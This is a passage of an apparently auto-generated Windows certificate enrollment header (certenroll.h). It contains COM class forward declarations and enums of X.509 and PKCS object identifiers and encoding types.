#endif 	/* __CCertPropertyFriendlyName_FWD_DEFINED__ */


#ifndef __CCertPropertyDescription_FWD_DEFINED__
#define __CCertPropertyDescription_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyDescription CCertPropertyDescription;
#else
typedef struct CCertPropertyDescription CCertPropertyDescription;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyDescription_FWD_DEFINED__ */


#ifndef __CCertPropertyAutoEnroll_FWD_DEFINED__
#define __CCertPropertyAutoEnroll_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
#else
typedef struct CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyAutoEnroll_FWD_DEFINED__ */


#ifndef __CCertPropertyRequestOriginator_FWD_DEFINED__
#define __CCertPropertyRequestOriginator_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyRequestOriginator CCertPropertyRequestOriginator;
#else
typedef struct CCertPropertyRequestOriginator CCertPropertyRequestOriginator;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyRequestOriginator_FWD_DEFINED__ */


#ifndef __CCertPropertySHA1Hash_FWD_DEFINED__
#define __CCertPropertySHA1Hash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertySHA1Hash CCertPropertySHA1Hash;
#else
typedef struct CCertPropertySHA1Hash CCertPropertySHA1Hash;
#endif /* __cplusplus */

#endif 	/* __CCertPropertySHA1Hash_FWD_DEFINED__ */


#ifndef __CCertPropertyKeyProvInfo_FWD_DEFINED__
#define __CCertPropertyKeyProvInfo_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
#else
typedef struct CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyKeyProvInfo_FWD_DEFINED__ */


#ifndef __CCertPropertyArchived_FWD_DEFINED__
#define __CCertPropertyArchived_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyArchived CCertPropertyArchived;
#else
typedef struct CCertPropertyArchived CCertPropertyArchived;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyArchived_FWD_DEFINED__ */


#ifndef __CCertPropertyBackedUp_FWD_DEFINED__
#define __CCertPropertyBackedUp_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyBackedUp CCertPropertyBackedUp;
#else
typedef struct CCertPropertyBackedUp CCertPropertyBackedUp;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyBackedUp_FWD_DEFINED__ */


#ifndef __CCertPropertyEnrollment_FWD_DEFINED__
#define __CCertPropertyEnrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyEnrollment CCertPropertyEnrollment;
#else
typedef struct CCertPropertyEnrollment CCertPropertyEnrollment;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyEnrollment_FWD_DEFINED__ */


#ifndef __CCertPropertyRenewal_FWD_DEFINED__
#define __CCertPropertyRenewal_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyRenewal CCertPropertyRenewal;
#else
typedef struct CCertPropertyRenewal CCertPropertyRenewal;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyRenewal_FWD_DEFINED__ */


#ifndef __CCertPropertyArchivedKeyHash_FWD_DEFINED__
#define __CCertPropertyArchivedKeyHash_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
#else
typedef struct CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyArchivedKeyHash_FWD_DEFINED__ */


#ifndef __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__
#define __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__

#ifdef __cplusplus
typedef class CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollmentPolicyServer;
#else
typedef struct CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollmentPolicyServer;
#endif /* __cplusplus */

#endif 	/* __CCertPropertyEnrollmentPolicyServer_FWD_DEFINED__ */


#ifndef __CSignerCertificate_FWD_DEFINED__
#define __CSignerCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CSignerCertificate CSignerCertificate;
#else
typedef struct CSignerCertificate CSignerCertificate;
#endif /* __cplusplus */

#endif 	/* __CSignerCertificate_FWD_DEFINED__ */


#ifndef __CX509NameValuePair_FWD_DEFINED__
#define __CX509NameValuePair_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509NameValuePair CX509NameValuePair;
#else
typedef struct CX509NameValuePair CX509NameValuePair;
#endif /* __cplusplus */

#endif 	/* __CX509NameValuePair_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestPkcs10_FWD_DEFINED__
#define __CX509CertificateRequestPkcs10_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
#else
typedef struct CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestPkcs10_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestCertificate_FWD_DEFINED__
#define __CX509CertificateRequestCertificate_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestCertificate CX509CertificateRequestCertificate;
#else
typedef struct CX509CertificateRequestCertificate CX509CertificateRequestCertificate;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestCertificate_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestPkcs7_FWD_DEFINED__
#define __CX509CertificateRequestPkcs7_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
#else
typedef struct CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestPkcs7_FWD_DEFINED__ */


#ifndef __CX509CertificateRequestCmc_FWD_DEFINED__
#define __CX509CertificateRequestCmc_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateRequestCmc CX509CertificateRequestCmc;
#else
typedef struct CX509CertificateRequestCmc CX509CertificateRequestCmc;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateRequestCmc_FWD_DEFINED__ */


#ifndef __CX509Enrollment_FWD_DEFINED__
#define __CX509Enrollment_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509Enrollment CX509Enrollment;
#else
typedef struct CX509Enrollment CX509Enrollment;
#endif /* __cplusplus */

#endif 	/* __CX509Enrollment_FWD_DEFINED__ */


#ifndef __CX509EnrollmentWebClassFactory_FWD_DEFINED__
#define __CX509EnrollmentWebClassFactory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFactory;
#else
typedef struct CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFactory;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentWebClassFactory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentHelper_FWD_DEFINED__
#define __CX509EnrollmentHelper_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentHelper CX509EnrollmentHelper;
#else
typedef struct CX509EnrollmentHelper CX509EnrollmentHelper;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentHelper_FWD_DEFINED__ */


#ifndef __CX509MachineEnrollmentFactory_FWD_DEFINED__
#define __CX509MachineEnrollmentFactory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
#else
typedef struct CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
#endif /* __cplusplus */

#endif 	/* __CX509MachineEnrollmentFactory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__
#define __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolicyActiveDirectory;
#else
typedef struct CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolicyActiveDirectory;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentPolicyActiveDirectory_FWD_DEFINED__ */


#ifndef __CX509EnrollmentPolicyWebService_FWD_DEFINED__
#define __CX509EnrollmentPolicyWebService_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebService;
#else
typedef struct CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebService;
#endif /* __cplusplus */

#endif 	/* __CX509EnrollmentPolicyWebService_FWD_DEFINED__ */


#ifndef __CX509PolicyServerListManager_FWD_DEFINED__
#define __CX509PolicyServerListManager_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PolicyServerListManager CX509PolicyServerListManager;
#else
typedef struct CX509PolicyServerListManager CX509PolicyServerListManager;
#endif /* __cplusplus */

#endif 	/* __CX509PolicyServerListManager_FWD_DEFINED__ */


#ifndef __CX509PolicyServerUrl_FWD_DEFINED__
#define __CX509PolicyServerUrl_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509PolicyServerUrl CX509PolicyServerUrl;
#else
typedef struct CX509PolicyServerUrl CX509PolicyServerUrl;
#endif /* __cplusplus */

#endif 	/* __CX509PolicyServerUrl_FWD_DEFINED__ */


#ifndef __CX509CertificateTemplateADWritable_FWD_DEFINED__
#define __CX509CertificateTemplateADWritable_FWD_DEFINED__

#ifdef __cplusplus
typedef class CX509CertificateTemplateADWritable CX509CertificateTemplateADWritable;
#else
typedef struct CX509CertificateTemplateADWritable CX509CertificateTemplateADWritable;
#endif /* __cplusplus */

#endif 	/* __CX509CertificateTemplateADWritable_FWD_DEFINED__ */


/* header files for imported files */
#include <wtypes.h>
#include <oaidl.h>
#include <certcli.h>

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certenroll_0000_0000 */
/* [local] */ 

#if defined(MIDL_PASS)
typedef typedef void VOID;
;

#endif



typedef 
enum CERTENROLL_OBJECTID
    {	XCN_OID_NONE	= 0,
	XCN_OID_RSA	= 1,
	XCN_OID_PKCS	= 2,
	XCN_OID_RSA_HASH	= 3,
	XCN_OID_RSA_ENCRYPT	= 4,
	XCN_OID_PKCS_1	= 5,
	XCN_OID_PKCS_2	= 6,
	XCN_OID_PKCS_3	= 7,
	XCN_OID_PKCS_4	= 8,
	XCN_OID_PKCS_5	= 9,
	XCN_OID_PKCS_6	= 10,
	XCN_OID_PKCS_7	= 11,
	XCN_OID_PKCS_8	= 12,
	XCN_OID_PKCS_9	= 13,
	XCN_OID_PKCS_10	= 14,
	XCN_OID_PKCS_12	= 15,
	XCN_OID_RSA_RSA	= 16,
	XCN_OID_RSA_MD2RSA	= 17,
	XCN_OID_RSA_MD4RSA	= 18,
	XCN_OID_RSA_MD5RSA	= 19,
	XCN_OID_RSA_SHA1RSA	= 20,
	XCN_OID_RSA_SETOAEP_RSA	= 21,
	XCN_OID_RSA_DH	= 22,
	XCN_OID_RSA_data	= 23,
	XCN_OID_RSA_signedData	= 24,
	XCN_OID_RSA_envelopedData	= 25,
	XCN_OID_RSA_signEnvData	= 26,
	XCN_OID_RSA_digestedData	= 27,
	XCN_OID_RSA_hashedData	= 28,
	XCN_OID_RSA_encryptedData	= 29,
	XCN_OID_RSA_emailAddr	= 30,
	XCN_OID_RSA_unstructName	= 31,
	XCN_OID_RSA_contentType	= 32,
	XCN_OID_RSA_messageDigest	= 33,
	XCN_OID_RSA_signingTime	= 34,
	XCN_OID_RSA_counterSign	= 35,
	XCN_OID_RSA_challengePwd	= 36,
	XCN_OID_RSA_unstructAddr	= 37,
	XCN_OID_RSA_extCertAttrs	= 38,
	XCN_OID_RSA_certExtensions	= 39,
	XCN_OID_RSA_SMIMECapabilities	= 40,
	XCN_OID_RSA_preferSignedData	= 41,
	XCN_OID_RSA_SMIMEalg	= 42,
	XCN_OID_RSA_SMIMEalgESDH	= 43,
	XCN_OID_RSA_SMIMEalgCMS3DESwrap	= 44,
	XCN_OID_RSA_SMIMEalgCMSRC2wrap	= 45,
	XCN_OID_RSA_MD2	= 46,
	XCN_OID_RSA_MD4	= 47,
	XCN_OID_RSA_MD5	= 48,
	XCN_OID_RSA_RC2CBC	= 49,
	XCN_OID_RSA_RC4	= 50,
	XCN_OID_RSA_DES_EDE3_CBC	= 51,
	XCN_OID_RSA_RC5_CBCPad	= 52,
	XCN_OID_ANSI_X942	= 53,
	XCN_OID_ANSI_X942_DH	= 54,
	XCN_OID_X957	= 55,
	XCN_OID_X957_DSA	= 56,
	XCN_OID_X957_SHA1DSA	= 57,
	XCN_OID_DS	= 58,
	XCN_OID_DSALG	= 59,
	XCN_OID_DSALG_CRPT	= 60,
	XCN_OID_DSALG_HASH	= 61,
	XCN_OID_DSALG_SIGN	= 62,
	XCN_OID_DSALG_RSA	= 63,
	XCN_OID_OIW	= 64,
	XCN_OID_OIWSEC	= 65,
	XCN_OID_OIWSEC_md4RSA	= 66,
	XCN_OID_OIWSEC_md5RSA	= 67,
	XCN_OID_OIWSEC_md4RSA2	= 68,
	XCN_OID_OIWSEC_desECB	= 69,
	XCN_OID_OIWSEC_desCBC	= 70,
	XCN_OID_OIWSEC_desOFB	= 71,
	XCN_OID_OIWSEC_desCFB	= 72,
	XCN_OID_OIWSEC_desMAC	= 73,
	XCN_OID_OIWSEC_rsaSign	= 74,
	XCN_OID_OIWSEC_dsa	= 75,
	XCN_OID_OIWSEC_shaDSA	= 76,
	XCN_OID_OIWSEC_mdc2RSA	= 77,
	XCN_OID_OIWSEC_shaRSA	= 78,
	XCN_OID_OIWSEC_dhCommMod	= 79,
	XCN_OID_OIWSEC_desEDE	= 80,
	XCN_OID_OIWSEC_sha	= 81,
	XCN_OID_OIWSEC_mdc2	= 82,
	XCN_OID_OIWSEC_dsaComm	= 83,
	XCN_OID_OIWSEC_dsaCommSHA	= 84,
	XCN_OID_OIWSEC_rsaXchg	= 85,
	XCN_OID_OIWSEC_keyHashSeal	= 86,
	XCN_OID_OIWSEC_md2RSASign	= 87,
	XCN_OID_OIWSEC_md5RSASign	= 88,
	XCN_OID_OIWSEC_sha1	= 89,
	XCN_OID_OIWSEC_dsaSHA1	= 90,
	XCN_OID_OIWSEC_dsaCommSHA1	= 91,
	XCN_OID_OIWSEC_sha1RSASign	= 92,
	XCN_OID_OIWDIR	= 93,
	XCN_OID_OIWDIR_CRPT	= 94,
	XCN_OID_OIWDIR_HASH	= 95,
	XCN_OID_OIWDIR_SIGN	= 96,
	XCN_OID_OIWDIR_md2	= 97,
	XCN_OID_OIWDIR_md2RSA	= 98,
	XCN_OID_INFOSEC	= 99,
	XCN_OID_INFOSEC_sdnsSignature	= 100,
	XCN_OID_INFOSEC_mosaicSignature	= 101,
	XCN_OID_INFOSEC_sdnsConfidentiality	= 102,
	XCN_OID_INFOSEC_mosaicConfidentiality	= 103,
	XCN_OID_INFOSEC_sdnsIntegrity	= 104,
	XCN_OID_INFOSEC_mosaicIntegrity	= 105,
	XCN_OID_INFOSEC_sdnsTokenProtection	= 106,
	XCN_OID_INFOSEC_mosaicTokenProtection	= 107,
	XCN_OID_INFOSEC_sdnsKeyManagement	= 108,
	XCN_OID_INFOSEC_mosaicKeyManagement	= 109,
	XCN_OID_INFOSEC_sdnsKMandSig	= 110,
	XCN_OID_INFOSEC_mosaicKMandSig	= 111,
	XCN_OID_INFOSEC_SuiteASignature	= 112,
	XCN_OID_INFOSEC_SuiteAConfidentiality	= 113,
	XCN_OID_INFOSEC_SuiteAIntegrity	= 114,
	XCN_OID_INFOSEC_SuiteATokenProtection	= 115,
	XCN_OID_INFOSEC_SuiteAKeyManagement	= 116,
	XCN_OID_INFOSEC_SuiteAKMandSig	= 117,
	XCN_OID_INFOSEC_mosaicUpdatedSig	= 118,
	XCN_OID_INFOSEC_mosaicKMandUpdSig	= 119,
	XCN_OID_INFOSEC_mosaicUpdatedInteg	= 120,
	XCN_OID_COMMON_NAME	= 121,
	XCN_OID_SUR_NAME	= 122,
	XCN_OID_DEVICE_SERIAL_NUMBER	= 123,
	XCN_OID_COUNTRY_NAME	= 124,
	XCN_OID_LOCALITY_NAME	= 125,
	XCN_OID_STATE_OR_PROVINCE_NAME	= 126,
	XCN_OID_STREET_ADDRESS	= 127,
	XCN_OID_ORGANIZATION_NAME	= 128,
	XCN_OID_ORGANIZATIONAL_UNIT_NAME	= 129,
	XCN_OID_TITLE	= 130,
	XCN_OID_DESCRIPTION	= 131,
	XCN_OID_SEARCH_GUIDE	= 132,
	XCN_OID_BUSINESS_CATEGORY	= 133,
	XCN_OID_POSTAL_ADDRESS	= 134,
	XCN_OID_POSTAL_CODE	= 135,
	XCN_OID_POST_OFFICE_BOX	= 136,
	XCN_OID_PHYSICAL_DELIVERY_OFFICE_NAME	= 137,
	XCN_OID_TELEPHONE_NUMBER	= 138,
	XCN_OID_TELEX_NUMBER	= 139,
	XCN_OID_TELETEXT_TERMINAL_IDENTIFIER	= 140,
	XCN_OID_FACSIMILE_TELEPHONE_NUMBER	= 141,
	XCN_OID_X21_ADDRESS	= 142,
	XCN_OID_INTERNATIONAL_ISDN_NUMBER	= 143,
	XCN_OID_REGISTERED_ADDRESS	= 144,
	XCN_OID_DESTINATION_INDICATOR	= 145,
	XCN_OID_PREFERRED_DELIVERY_METHOD	= 146,
	XCN_OID_PRESENTATION_ADDRESS	= 147,
	XCN_OID_SUPPORTED_APPLICATION_CONTEXT	= 148,
	XCN_OID_MEMBER	= 149,
	XCN_OID_OWNER	= 150,
	XCN_OID_ROLE_OCCUPANT	= 151,
	XCN_OID_SEE_ALSO	= 152,
	XCN_OID_USER_PASSWORD	= 153,
	XCN_OID_USER_CERTIFICATE	= 154,
	XCN_OID_CA_CERTIFICATE	= 155,
	XCN_OID_AUTHORITY_REVOCATION_LIST	= 156,
	XCN_OID_CERTIFICATE_REVOCATION_LIST	= 157,
	XCN_OID_CROSS_CERTIFICATE_PAIR	= 158,
	XCN_OID_GIVEN_NAME	= 159,
	XCN_OID_INITIALS	= 160,
	XCN_OID_DN_QUALIFIER	= 161,
	XCN_OID_DOMAIN_COMPONENT	= 162,
	XCN_OID_PKCS_12_FRIENDLY_NAME_ATTR	= 163,
	XCN_OID_PKCS_12_LOCAL_KEY_ID	= 164,
	XCN_OID_PKCS_12_KEY_PROVIDER_NAME_ATTR	= 165,
	XCN_OID_LOCAL_MACHINE_KEYSET	= 166,
	XCN_OID_PKCS_12_EXTENDED_ATTRIBUTES	= 167,
	XCN_OID_KEYID_RDN	= 168,
	XCN_OID_AUTHORITY_KEY_IDENTIFIER	= 169,
	XCN_OID_KEY_ATTRIBUTES	= 170,
	XCN_OID_CERT_POLICIES_95	= 171,
	XCN_OID_KEY_USAGE_RESTRICTION	= 172,
	XCN_OID_SUBJECT_ALT_NAME	= 173,
	XCN_OID_ISSUER_ALT_NAME	= 174,
	XCN_OID_BASIC_CONSTRAINTS	= 175,
	XCN_OID_KEY_USAGE	= 176,
	XCN_OID_PRIVATEKEY_USAGE_PERIOD	= 177,
	XCN_OID_BASIC_CONSTRAINTS2	= 178,
	XCN_OID_CERT_POLICIES	= 179,
	XCN_OID_ANY_CERT_POLICY	= 180,
	XCN_OID_AUTHORITY_KEY_IDENTIFIER2	= 181,
	XCN_OID_SUBJECT_KEY_IDENTIFIER	= 182,
	XCN_OID_SUBJECT_ALT_NAME2	= 183,
	XCN_OID_ISSUER_ALT_NAME2	= 184,
	XCN_OID_CRL_REASON_CODE	= 185,
	XCN_OID_REASON_CODE_HOLD	= 186,
	XCN_OID_CRL_DIST_POINTS	= 187,
	XCN_OID_ENHANCED_KEY_USAGE	= 188,
	XCN_OID_CRL_NUMBER	= 189,
	XCN_OID_DELTA_CRL_INDICATOR	= 190,
	XCN_OID_ISSUING_DIST_POINT	= 191,
	XCN_OID_FRESHEST_CRL	= 192,
	XCN_OID_NAME_CONSTRAINTS	= 193,
	XCN_OID_POLICY_MAPPINGS	= 194,
	XCN_OID_LEGACY_POLICY_MAPPINGS	= 195,
	XCN_OID_POLICY_CONSTRAINTS	= 196,
	XCN_OID_RENEWAL_CERTIFICATE	= 197,
	XCN_OID_ENROLLMENT_NAME_VALUE_PAIR	= 198,
	XCN_OID_ENROLLMENT_CSP_PROVIDER	= 199,
	XCN_OID_OS_VERSION	= 200,
	XCN_OID_ENROLLMENT_AGENT	= 201,
	XCN_OID_PKIX	= 202,
	XCN_OID_PKIX_PE	= 203,
	XCN_OID_AUTHORITY_INFO_ACCESS	= 204,
	XCN_OID_BIOMETRIC_EXT	= 205,
	XCN_OID_LOGOTYPE_EXT	= 206,
	XCN_OID_CERT_EXTENSIONS	= 207,
	XCN_OID_NEXT_UPDATE_LOCATION	= 208,
	XCN_OID_REMOVE_CERTIFICATE	= 209,
	XCN_OID_CROSS_CERT_DIST_POINTS	= 210,
	XCN_OID_CTL	= 211,
	XCN_OID_SORTED_CTL	= 212,
	XCN_OID_SERIALIZED	= 213,
	XCN_OID_NT_PRINCIPAL_NAME	= 214,
	XCN_OID_PRODUCT_UPDATE	= 215,
	XCN_OID_ANY_APPLICATION_POLICY	= 216,
	XCN_OID_AUTO_ENROLL_CTL_USAGE	= 217,
	XCN_OID_ENROLL_CERTTYPE_EXTENSION	= 218,
	XCN_OID_CERT_MANIFOLD	= 219,
	XCN_OID_CERTSRV_CA_VERSION	= 220,
	XCN_OID_CERTSRV_PREVIOUS_CERT_HASH	= 221,
	XCN_OID_CRL_VIRTUAL_BASE	= 222,
	XCN_OID_CRL_NEXT_PUBLISH	= 223,
	XCN_OID_KP_CA_EXCHANGE	= 224,
	XCN_OID_KP_KEY_RECOVERY_AGENT	= 225,
	XCN_OID_CERTIFICATE_TEMPLATE	= 226,
	XCN_OID_ENTERPRISE_OID_ROOT	= 227,
	XCN_OID_RDN_DUMMY_SIGNER	= 228,
	XCN_OID_APPLICATION_CERT_POLICIES	= 229,
	XCN_OID_APPLICATION_POLICY_MAPPINGS	= 230,
	XCN_OID_APPLICATION_POLICY_CONSTRAINTS	= 231,
	XCN_OID_ARCHIVED_KEY_ATTR	= 232,
	XCN_OID_CRL_SELF_CDP	= 233,
	XCN_OID_REQUIRE_CERT_CHAIN_POLICY	= 234,
	XCN_OID_ARCHIVED_KEY_CERT_HASH	= 235,
	XCN_OID_ISSUED_CERT_HASH	= 236,
	XCN_OID_DS_EMAIL_REPLICATION	= 237,
	XCN_OID_REQUEST_CLIENT_INFO	= 238,
	XCN_OID_ENCRYPTED_KEY_HASH	= 239,
	XCN_OID_CERTSRV_CROSSCA_VERSION	= 240,
	XCN_OID_NTDS_REPLICATION	= 241,
	XCN_OID_SUBJECT_DIR_ATTRS	= 242,
	XCN_OID_PKIX_KP	= 243,
	XCN_OID_PKIX_KP_SERVER_AUTH	= 244,
	XCN_OID_PKIX_KP_CLIENT_AUTH	= 245,
	XCN_OID_PKIX_KP_CODE_SIGNING	= 246,
	XCN_OID_PKIX_KP_EMAIL_PROTECTION	= 247,
	XCN_OID_PKIX_KP_IPSEC_END_SYSTEM	= 248,
	XCN_OID_PKIX_KP_IPSEC_TUNNEL	= 249,
	XCN_OID_PKIX_KP_IPSEC_USER	= 250,
	XCN_OID_PKIX_KP_TIMESTAMP_SIGNING	= 251,
	XCN_OID_PKIX_KP_OCSP_SIGNING	= 252,
	XCN_OID_PKIX_OCSP_NOCHECK	= 253,
	XCN_OID_IPSEC_KP_IKE_INTERMEDIATE	= 254,
	XCN_OID_KP_CTL_USAGE_SIGNING	= 255,
	XCN_OID_KP_TIME_STAMP_SIGNING	= 256,
	XCN_OID_SERVER_GATED_CRYPTO	= 257,
	XCN_OID_SGC_NETSCAPE	= 258,
	XCN_OID_KP_EFS	= 259,
	XCN_OID_EFS_RECOVERY	= 260,
	XCN_OID_WHQL_CRYPTO	= 261,
	XCN_OID_NT5_CRYPTO	= 262,
	XCN_OID_OEM_WHQL_CRYPTO	= 263,
	XCN_OID_EMBEDDED_NT_CRYPTO	= 264,
	XCN_OID_ROOT_LIST_SIGNER	= 265,
	XCN_OID_KP_QUALIFIED_SUBORDINATION	= 266,
	XCN_OID_KP_KEY_RECOVERY	= 267,
	XCN_OID_KP_DOCUMENT_SIGNING	= 268,
	XCN_OID_KP_LIFETIME_SIGNING	= 269,
	XCN_OID_KP_MOBILE_DEVICE_SOFTWARE	= 270,
	XCN_OID_KP_SMART_DISPLAY	= 271,
	XCN_OID_KP_CSP_SIGNATURE	= 272,
	XCN_OID_DRM	= 273,
	XCN_OID_DRM_INDIVIDUALIZATION	= 274,
	XCN_OID_LICENSES	= 275,
	XCN_OID_LICENSE_SERVER	= 276,
	XCN_OID_KP_SMARTCARD_LOGON	= 277,
	XCN_OID_YESNO_TRUST_ATTR	= 278,
	XCN_OID_PKIX_POLICY_QUALIFIER_CPS	= 279,
	XCN_OID_PKIX_POLICY_QUALIFIER_USERNOTICE	= 280,
	XCN_OID_CERT_POLICIES_95_QUALIFIER1	= 281,
	XCN_OID_PKIX_ACC_DESCR	= 282,
	XCN_OID_PKIX_OCSP	= 283,
	XCN_OID_PKIX_CA_ISSUERS	= 284,
	XCN_OID_VERISIGN_PRIVATE_6_9	= 285,
	XCN_OID_VERISIGN_ONSITE_JURISDICTION_HASH	= 286,
	XCN_OID_VERISIGN_BITSTRING_6_13	= 287,
	XCN_OID_VERISIGN_ISS_STRONG_CRYPTO	= 288,
	XCN_OID_NETSCAPE	= 289,
	XCN_OID_NETSCAPE_CERT_EXTENSION	= 290,
	XCN_OID_NETSCAPE_CERT_TYPE	= 291,
	XCN_OID_NETSCAPE_BASE_URL	= 292,
	XCN_OID_NETSCAPE_REVOCATION_URL	= 293,
	XCN_OID_NETSCAPE_CA_REVOCATION_URL	= 294,
	XCN_OID_NETSCAPE_CERT_RENEWAL_URL	= 295,
	XCN_OID_NETSCAPE_CA_POLICY_URL	= 296,
	XCN_OID_NETSCAPE_SSL_SERVER_NAME	= 297,
	XCN_OID_NETSCAPE_COMMENT	= 298,
	XCN_OID_NETSCAPE_DATA_TYPE	= 299,
	XCN_OID_NETSCAPE_CERT_SEQUENCE	= 300,
	XCN_OID_CT_PKI_DATA	= 301,
	XCN_OID_CT_PKI_RESPONSE	= 302,
	XCN_OID_PKIX_NO_SIGNATURE	= 303,
	XCN_OID_CMC	= 304,
	XCN_OID_CMC_STATUS_INFO	= 305,
	XCN_OID_CMC_IDENTIFICATION	= 306,
	XCN_OID_CMC_IDENTITY_PROOF	= 307,
	XCN_OID_CMC_DATA_RETURN	= 308,
	XCN_OID_CMC_TRANSACTION_ID	= 309,
	XCN_OID_CMC_SENDER_NONCE	= 310,
	XCN_OID_CMC_RECIPIENT_NONCE	= 311,
	XCN_OID_CMC_ADD_EXTENSIONS	= 312,
	XCN_OID_CMC_ENCRYPTED_POP	= 313,
	XCN_OID_CMC_DECRYPTED_POP	= 314,
	XCN_OID_CMC_LRA_POP_WITNESS	= 315,
	XCN_OID_CMC_GET_CERT	= 316,
	XCN_OID_CMC_GET_CRL	= 317,
	XCN_OID_CMC_REVOKE_REQUEST	= 318,
	XCN_OID_CMC_REG_INFO	= 319,
	XCN_OID_CMC_RESPONSE_INFO	= 320,
	XCN_OID_CMC_QUERY_PENDING	= 321,
	XCN_OID_CMC_ID_POP_LINK_RANDOM	= 322,
	XCN_OID_CMC_ID_POP_LINK_WITNESS	= 323,
	XCN_OID_CMC_ID_CONFIRM_CERT_ACCEPTANCE	= 324,
	XCN_OID_CMC_ADD_ATTRIBUTES	= 325,
	XCN_OID_LOYALTY_OTHER_LOGOTYPE	= 326,
	XCN_OID_BACKGROUND_OTHER_LOGOTYPE	= 327,
	XCN_OID_PKIX_OCSP_BASIC_SIGNED_RESPONSE	= 328,
	XCN_OID_PKCS_7_DATA	= 329,
	XCN_OID_PKCS_7_SIGNED	= 330,
	XCN_OID_PKCS_7_ENVELOPED	= 331,
	XCN_OID_PKCS_7_SIGNEDANDENVELOPED	= 332,
	XCN_OID_PKCS_7_DIGESTED	= 333,
	XCN_OID_PKCS_7_ENCRYPTED	= 334,
	XCN_OID_PKCS_9_CONTENT_TYPE	= 335,
	XCN_OID_PKCS_9_MESSAGE_DIGEST	= 336,
	XCN_OID_CERT_PROP_ID_PREFIX	= 337,
	XCN_OID_CERT_KEY_IDENTIFIER_PROP_ID	= 338,
	XCN_OID_CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID	= 339,
	XCN_OID_CERT_SUBJECT_NAME_MD5_HASH_PROP_ID	= 340,
	XCN_OID_CERT_MD5_HASH_PROP_ID	= 341,
	XCN_OID_RSA_SHA256RSA	= 342,
	XCN_OID_RSA_SHA384RSA	= 343,
	XCN_OID_RSA_SHA512RSA	= 344,
	XCN_OID_NIST_sha256	= 345,
	XCN_OID_NIST_sha384	= 346,
	XCN_OID_NIST_sha512	= 347,
	XCN_OID_RSA_MGF1	= 348,
	XCN_OID_ECC_PUBLIC_KEY	= 349,
	XCN_OID_RSA_SSA_PSS	= 353,
	XCN_OID_ECDSA_SHA1	= 354,
	XCN_OID_ECDSA_SPECIFIED	= 354
    } 	CERTENROLL_OBJECTID;

typedef 
enum WebSecurityLevel
    {	LevelUnsafe	= 0,
	LevelSafe	= 1
    } 	WebSecurityLevel;

#define	CERTENROLL_INDEX_BASE	( 0 )

typedef 
enum EncodingType
    {	XCN_CRYPT_STRING_BASE64HEADER	= 0,
	XCN_CRYPT_STRING_BASE64	= 0x1,
	XCN_CRYPT_STRING_BINARY	= 0x2,
	XCN_CRYPT_STRING_BASE64REQUESTHEADER	= 0x3,
	XCN_CRYPT_STRING_HEX	= 0x4,
